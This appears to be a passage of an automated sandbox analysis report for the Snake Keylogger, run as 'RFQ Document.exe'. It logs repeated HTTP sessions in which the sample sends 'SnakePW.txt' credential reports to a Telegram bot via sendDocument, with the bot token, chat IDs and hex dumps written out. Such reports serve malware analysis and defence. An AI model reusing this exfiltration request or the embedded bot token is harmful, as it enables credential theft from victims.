                                            2021-09-28 05:59:29 UTC344INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 36 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12802,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808769,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            217192.168.2.450038149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:30 UTC344OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255eb2d79f5
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:30 UTC345OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 62 32 64 37 39 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255eb2d79f5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:30 UTC345INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:30 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:30 UTC346INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 30 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12803,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808770,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            218192.168.2.450039149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:32 UTC346OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255eb4c7845
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:32 UTC346OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 62 34 63 37 38 34 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255eb4c7845Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:32 UTC347INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:32 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:32 UTC347INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12804,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808772,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            219192.168.2.450040149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:32 UTC348OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ec9ca33d
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:32 UTC348OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 63 39 63 61 33 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ec9ca33dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:32 UTC348INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:32 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:32 UTC349INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 30 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12805,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808772,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            22192.168.2.449796149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:25 UTC34OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c46f4cca
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:25 UTC35OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 34 36 66 34 63 63 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c46f4ccaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:25 UTC35INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:25 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:25 UTC36INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12602,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808705,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            220192.168.2.450041149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:32 UTC349OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ecbba305
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:32 UTC350OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 63 62 62 61 33 30 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ecbba305Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:32 UTC350INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:32 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:32 UTC350INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12806,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808772,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            221192.168.2.450042149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:32 UTC351OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ecd11949
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:32 UTC351OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 63 64 31 31 39 34 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ecd11949Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:32 UTC352INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:32 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:32 UTC352INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 30 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 32 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12807,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808772,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            222192.168.2.450043149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:32 UTC352OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ecf01548
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:32 UTC353OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 63 66 30 31 35 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ecf01548Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:33 UTC353INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:33 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:33 UTC354INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 33 2c 22 64
